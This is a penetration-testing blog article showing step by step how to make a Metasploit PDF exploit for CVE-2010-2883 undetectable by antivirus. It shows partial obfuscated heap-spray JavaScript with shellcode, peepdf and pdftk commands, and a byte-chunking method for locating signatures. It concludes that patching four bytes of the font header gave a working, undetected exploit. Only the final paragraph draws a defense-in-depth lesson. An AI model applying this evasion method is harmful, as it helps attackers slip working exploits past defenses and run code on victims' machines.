Every pentester has one day grappled with an antivirus blocking his tools, be it for a pentest, a phishing campaign, a security awareness demonstration, and so on. Several Internet resources present usual techniques for bypassing AV signatures when working with executables, or at least when the detection affects the used payload, like a
meterpreter. Then, one can resort to encoders, packers, or more manual solutions like modifying & recompiling the exploit code.
But what to do when the detection affects an exploit regarding a file format like PDF, and the active payload is not detected, rendering encoders useless ?
This article gives a few approaches for those kind of situations, and shows the importance of defense in depth when a malicious code is able to bypass all the gates and reaches the heart of the company.
The exploit used here is generated by the
metasploit module "adobecooltypesing", exploiting CVE-2010-2883 in an old version of a PDF reader, and of course detected by most antiviruses. Virustotal rating of the PDF before any tampering is : 36/53. Note: in the remaining of the article, only one antivirus will be used to assess the detection. Also, for readability, the payloads are much shortened (at the location of "[...]" strings).
We had in mind that, at one point of another, it would be required to perform a dichotomic search by overwriting pieces of the file, smaller and smaller until a precise localization of the signature. However, this technique, which is also known when working with executable files, presents a risk of failure because of the possible PDF compression, if applied to naively.
Indeed, PDF streams can be compressed (or even encrypted in the case of password protected PDFs), which is apparently the case of the PDF produced by
metasploit. A quick "
strings - pipe -
A good idea is then to uncompress the PDF's streams with
pdftk and continue to work from there. The JS code becomes visible inside the new PDF:
$ strings msf_reverse_tcp.pdf | grep var $ pdftk msf_reverse_tcp.pdf output msf_reverse_tcp_unc.pdf uncompress $ strings msf_reverse_tcp_unc.pdf | grep var var bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw = unescape; var gKUPOmXAgssMAYAuMnIrRhSqUhhZhFECrgXJtAYZNCUrZXAdfT = bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000[...]
Then, the file can be analyzed further. A PDF usually contains a structure with several "objects", "streams", etc. It should be predictable that the exploit lays inside one of these, and it would be interesting to know which one exactly, before proceeding with signature hunting. Several tools allow examining this structure and extracting or editing the contents. The Origami library is pretty well known, but another tool with a quicker learning curve, peepdf, will save our life for this task (github).
Once the file open,
Then, using the commands
object, the contents of the different elements of the PDF are printed out in the console.
Confirmation is made that the relevant data is probably in streams 12 and 13. Indeed, the 12th stream contains a load of binary data, which turn out to be a TTF font when searching visible headers on the net. It also matches what can be seen inside the source code of the
metasploit module, or the information available about CVE-2010-2883.
PPDF> stream 12 00 01 00 00 00 11 01 00 00 04 00 10 4f 53 2f 32 |............OS/2| b4 5f f4 63 00 00 eb 70 00 00 00 56 50 43 4c 54 |._.c...p...VPCLT| d1 8a 5e 97 00 00 eb c8 00 00 00 36 63 6d 61 70 |..^........6cmap| [...] 09 c6 8e b2 00 00 b4 c4 00 00 04 30 6b 65 a2 6e |...........0ke.n| dc 52 d5 99 00 00 bd a0 00 00 2d 8a 6c 6f 63 61 |.R........-.loca| f3 cb d2 3d 00 00 bb 84 00 00 02 1a 6d 61 78 70 |...=........maxp| 05 47 06 3a 00 00 eb 2c 00 00 00 20 53 49 4e 47 |.G.:...,... SING| d9 bc c8 b5 00 00 01 1c 00 00 1d df 70 6f 73 74 |............post| b4 5a 2f bb 00 00 b8 f4 00 00 02 8e 70 72 65 70 |.Z/.........prep| 3b 07 f1 00 00 00 20 f8 00 00 05 68 00 00 01 00 |;..... ....h....|
PPDF> stream 13 var bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw = unescape; var gKUPOmXAgssMAYAuMnIrRhSqUhhZhFECrgXJtAYZNCUrZXAdfT = bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u[...]09eb%u7c1d%uae0c%u7e22%u7831%uf41b%ub872%u0718%u9dc9%u8209%ub131%u874a' ); var NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf = bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" ); while (NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf.length + 20 + 8 < 65536) NHsheKH[...] uyPOxlONxNAsEbZgKQSSHNBIjxCPEsRzmRikHPWBjFizyLiwUTcKsqDyoFqkyOgewwwOexstH = SoVA.substring(0, 0x80000 - (0x1020-0x08) / 2); var ytAVecOTixEhAmGUPrbvpDMQprLEUNHjpiGJoiSPLMkmwWIslXgaiQzDBXEmpFoNpO = new Array(); for (AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL=0;AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL<0x1f0;AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL++) ytAVecOTixEhAmGUPrbvpDMQprLEUNHjpiGJoiSPLMkmwWIslXgaiQzDBXEmpFoNpO[AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL]=uyPOxlONxNAsEbZgKQSSHNBIjxCPEsRzmRikHPWBjFizyLiwUTcKsqDyoFqkyOgewwwOexstH+"s";
Next, the idea is to isolate the contents of the streams one by one, by overwriting every one of them but one with a dummy string, before giving the results to the antivirus and checking how the detection changes.
modify command of
peepdf allows this substitution:
PPDF> modify Usage: modify object|stream $object_id [$version] [$file] Modifies the object or stream specified. It's possible to use a file to retrieve the stream content (ONLY for stream content).
For instance, substitution of the stream 12 with a "toto" string, and save to file:
PPDF> modify stream 12 Please, specify the stream content (if the content includes EOL characters use a file instead): toto Object modified successfully!! PPDF> save stream12.pdf File saved succesfully!!
Of course, the same process is repeated with all other possible suspect streams or objects. In this example, a set of 4 files will be generated, with respectively streams 9, 12, 13 and 14 isolated. The resulting files are scanned through the antivirus, and clearly things are becoming a little harder: the tests show that there are at least two different signatures, detecting both streams 12 and 13. However, no signature in any other object or stream.
The JS code from the PDF is copypasted on the website, and this one returns the following code, very different from the original one:
It remains to put this code inside the PDF thanks to
modify stream 13 modified.js. N.B. if the new data has carriage returns, it is necessary to use an intermediary file like here,
modified.js. Afterwards, the antivirus is ran on the new file. It is detected as EXP/CVE-2010-2883, which is known as the signature for the other stream containing the TTF font. To be sure, if the TTF stream is now replaced by a dummy string like "toto", no signature is triggered.
For the CVE detection bypass, it seemed convenient to come back to a good ol' dichotomy signature hunting.
The small script below was written for this purpose, probably not bug-free and quite naive, but covering the needs. It is used like this:
ruby chunker.rb <file> <number of chunks> [start offset] [end offset]. If no offsets are specified, the whole file is processed by default. Next, the script divides the zone to process according to the number of chunks asked, and overwrites them one by one with "AAAAA" strings, before writing the result in new files which names indicate the overwrite offsets.
To determine the relevant offsets for the first pass,
peepdf has a practical
offsets command, allowing to list the starting and ending offsets of the various PDF objects:
PPDF> offsets [...] 556 Object 9 (114) 669 672 Object 11 (126) 797 800 Object 12 (66000) 66799 66802 Object 4 (60) 66861 66864 Object 13 (53) 66916 [...] 67688 Trailer (51) 67738 67739 EOF
Remember, the stream holding the "malicious" TTF font is number 12, hence between bytes 800 and 66799. As the processed PDF is uncompressed, it is possible to run the
chunker.rb script directly on the file, between these offsets:
$ ruby chunker.rb msfrevtcp_jsOk.pdf 100 800 66799
In output, 100 new PDF files are generated, which names indicate between which offsets the data was overwritten:
$ ls output/ chunk-10026-10685.pdf chunk-17275-17934.pdf chunk-24524-25183.pdf chunk-31773-32432.pdf chunk-39022-39681.pdf chunk-46271-46930.pdf chunk-53520-54179.pdf chunk-6072-6731.pdf chunk-7390-8049.pdf chunk-10685-11344.pdf chunk-17934-18593.pdf chunk-25183-25842.pdf chunk-32432-33091.pdf chunk-39681-40340.pdf chunk-46930-47589.pdf chunk-5413-6072.pdf chunk-60769-61428.pdf chunk-800-1459.pdf chunk-11344-12003.pdf chunk-18593-19252.pdf chunk-25842-26501.pdf chunk-33091-33750.pdf chunk-40340-40999.pdf chunk-4754-5413.pdf chunk-54179-54838.pdf chunk-61428-62087.pdf chunk-8049-8708.pdf chunk-12003-12662.pdf chunk-19252-19911.pdf chunk-26501-27160.pdf chunk-33750-34409.pdf chunk-4095-4754.pdf chunk-47589-48248.pdf chunk-54838-55497.pdf chunk-62087-62746.pdf chunk-8708-9367.pdf chunk-12662-13321.pdf chunk-19911-20570.pdf chunk-27160-27819.pdf chunk-3436-4095.pdf chunk-40999-41658.pdf [...]
Next, the antivirus is ran over this file corpus, in cleaning mode, so there only remains in the folder the files that were not detected. That way, all the zones which overwrite allowed bypassing the AV detection can be obtained in one sight.
After this first script run, only one undetected file remains:
Conclusion, the signature lies between offsets 800 and 1459. It is then possible to run the script a second time between these new offsets, in order to identify more precisely the detected zone:
$ ruby chunker.rb msf_rev_tcp_jsOk.pdf 100 800 1459
This time, the amount of positive detections lowers, and the remaining files allow downsizing the detected zone between the offsets 1016 to 1148.
Apparently, there is no discontinuity in the detection, hence with a little luck, only one signature for the whole zone. Therefore, modifying only a few bytes between the 1016th and 1048th byte could be enough to bypass the antivirus. The problem being this is now a binary file that needs patching, and modifications must not "break" the exploit in any way.
The relevant zone is examined in an hexadecimal editor:
It looks like this is in the middle of the TTF file headers. Besides, the header announcing the "SING" table that allows exploitation of CVE-2010-2883 can be seen in the middle of the window. After a few checks, this zone could be a good news. By reading the
metasploit module, it is visible that the data important for the exploitation is written at the offset 284 (0x11c) of the TTF file. cf line 124 of the
Yet here, the detection happens between 1016 - 800 = 216 and 1148 - 800 = 348 bytes.
Why this 800 bytes correction ?
Peepdf has shown that the TTF file begins at offset 800 in the PDF file, while the offsets taken from the
metasploit module are relative to the TTF file itself.
In short, it might be possible to manipulate bytes from the TTF file between bytes 216 and 284, which is both before the significant shellcode bytes but also inside the antivirus detection zone, thus without "damaging" the exploit or having to dive into the assembly in order to modify it.
chunker.rb script from the beginning of the flagged zone inside stream 13, which means from offset 1016, it happened by luck that one of the produced files was perfectly functionnal as exploit while being undetectable.
Actually, the first produced file, as soon as offset 1016, does its job like a charm ! Curiosity urges to check what the script did overwrite exactly:
4 non-ASCII bytes inside the TTF header were replaced by "A"s. We won't go any further in parsing the TTF header to know what are these bytes precisely, given that the goal is reached and that it is now possible to enjoy successful exploitation and code execution despite the workstation's antivirus.
It was possible to combine already known signature isolation techniques with tools able to perform a good parsing of the targeted file format, in order to achieve antivirus bypass. The general approach was:
This methodology can be extended to other file formats, given access to tools able to extract structures and data that make up those formats.
If antivirus remain useful to block most malicious codes, they are generally efficient only against already known codes. Moreover, we have just seen that it is relatively easy to make undetectable a file that was previously flagged, without altering its operation. Therefore, the defense in depth principle is necessary in order to limit the potential of damage by a malicious code making its way into the heart of internal networks. Moreover, the malicious presence detection capacities must not limit to virus detection, but should take into account suspicious behaviours in every parts of the Information System.